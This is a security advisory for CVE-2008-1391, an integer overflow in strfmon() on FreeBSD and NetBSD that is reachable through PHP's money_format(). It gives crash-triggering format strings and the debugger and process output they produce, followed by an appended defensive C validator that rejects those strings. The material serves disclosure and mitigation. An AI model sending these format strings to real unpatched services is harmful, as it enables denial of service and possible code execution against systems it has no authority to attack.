BUGTRAQ ID: 28479
CVE ID: CVE-2008-1391
CNCVE ID: CNCVE-20081391
The strfmon() function on multiple BSD platforms contains an integer overflow in its format handling, which may allow arbitrary code execution in the context of the affected application. A failed attempt can result in a denial of service.
The affected function has the following prototype:
#include <monetary.h>
ssize_t
strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);
Compiling a test program that passes its argument to strfmon() and running it with the following format string:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
The problem shows up as follows:
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove() reallocates memory.
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
The next example:
cxib# ./pln %#99999999999999999999n
Long execution time. Let’s try check this process :
cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68
./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07
./pln %#99999999999999999999n
1 VSZ=140320
2 VSZ=482336
pln keeps allocating more memory. PHP uses strfmon() in its money_format() function, so when mod_php5 is used with Apache the same approach can be applied; the results are as follows:
NetBSD NetBSD 4.0
FreeBSD FreeBSD 6.0 .x
FreeBSD FreeBSD 6.0 -STABLE
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 7.0 BETA4
FreeBSD FreeBSD 7.0 -RELENG
FreeBSD FreeBSD 7.0 -PRERELEASE
FreeBSD FreeBSD 7.0
FreeBSD FreeBSD 6.0 -RELEASE-p5
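As an added defensive example, not part of this advisory and not the pln test program (whose source is not shown here), the following wrapper validates a strfmon() format string before forwarding it: every width and precision field is bounded while it is being parsed, so an oversized number like the ones above is refused before it can reach the library's own parser, and formats with more than one conversion are rejected because the wrapper supplies exactly one argument. The MAX_FIELD limit, the function names and the test amount are assumptions made for this example; the actual fix is the vendor patch, and this is only an application-layer mitigation for code that exposes a money_format()-style interface to untrusted input.

```c
#include <ctype.h>
#include <monetary.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Largest field width or precision this example forwards to strfmon().
   The value 64 is an assumption for the example, sized to the buffer used below. */
#define MAX_FIELD 64

/* Parse a decimal run at *p into *out, refusing as soon as it exceeds MAX_FIELD.
   Checking the bound during accumulation means a 20-digit width can never overflow an int. */
static bool parse_bounded_number(const char **p, int *out)
{
    int value = 0;
    if (!isdigit((unsigned char)**p))
        return false;
    while (isdigit((unsigned char)**p)) {
        value = value * 10 + (**p - '0');
        if (value > MAX_FIELD)
            return false;            /* too wide: stop before it grows further */
        (*p)++;
    }
    *out = value;
    return true;
}

/* Accept only literal text, "%%", and at most one conversion of the form
   %[=f][^][+|(][!][-][width][#left][.right](i|n), with every number <= MAX_FIELD. */
bool strfmon_format_is_safe(const char *fmt)
{
    const char *p = fmt;
    int conversions = 0;
    int n;

    while (*p) {
        if (*p != '%') { p++; continue; }
        p++;
        if (*p == '%') { p++; continue; }

        /* flags; '=' takes one fill character after it */
        while (*p && strchr("=^+(!-", *p)) {
            if (*p == '=') {
                p++;
                if (!*p)
                    return false;
            }
            p++;
        }
        if (isdigit((unsigned char)*p) && !parse_bounded_number(&p, &n))
            return false;
        if (*p == '#') { p++; if (!parse_bounded_number(&p, &n)) return false; }
        if (*p == '.') { p++; if (!parse_bounded_number(&p, &n)) return false; }
        if (*p != 'i' && *p != 'n')
            return false;            /* anything but the two money conversions */
        p++;
        if (++conversions > 1)
            return false;            /* we pass exactly one argument below */
    }
    return true;
}

/* Format one amount; returns bytes written, or -1 if the format was rejected
   or strfmon() itself failed (buffer is then an empty string). */
ssize_t safe_strfmon(char *buf, size_t bufsize, const char *fmt, double amount)
{
    if (bufsize == 0)
        return -1;
    if (!strfmon_format_is_safe(fmt)) {
        buf[0] = '\0';
        return -1;
    }
    ssize_t n = strfmon(buf, bufsize, fmt, amount);
    if (n < 0)
        buf[0] = '\0';
    return n;
}

/* Self-check with a constructed amount and a fixed, safe format: 1 = ok, 0 = failed. */
int safe_strfmon_selfcheck(void)
{
    char buf[MAX_FIELD + 32];
    ssize_t n = safe_strfmon(buf, sizeof buf, "%n", 1234.5);
    return n > 0 && strstr(buf, "1234") != NULL;
}

int main(void)
{
    /* The advisory's format strings, plus two benign ones, as constructed inputs */
    const char *inputs[] = { "%n", "%=*#6.2n", "%99999999999999999999n",
                             "%.9999999999n", "%#99999999999999999999n" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-28s %s\n", inputs[i],
               strfmon_format_is_safe(inputs[i]) ? "accepted" : "rejected");
    printf("self-check: %s\n", safe_strfmon_selfcheck() ? "ok" : "failed");
    return 0;
}
```

The check is deliberately stricter than strfmon() itself: unknown flags, missing conversion characters and multiple conversions are all rejected, which is the right default when the format originates from a request rather than from the program's own source.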
Contact the vendor for patch information:
http://www.netbsd.org/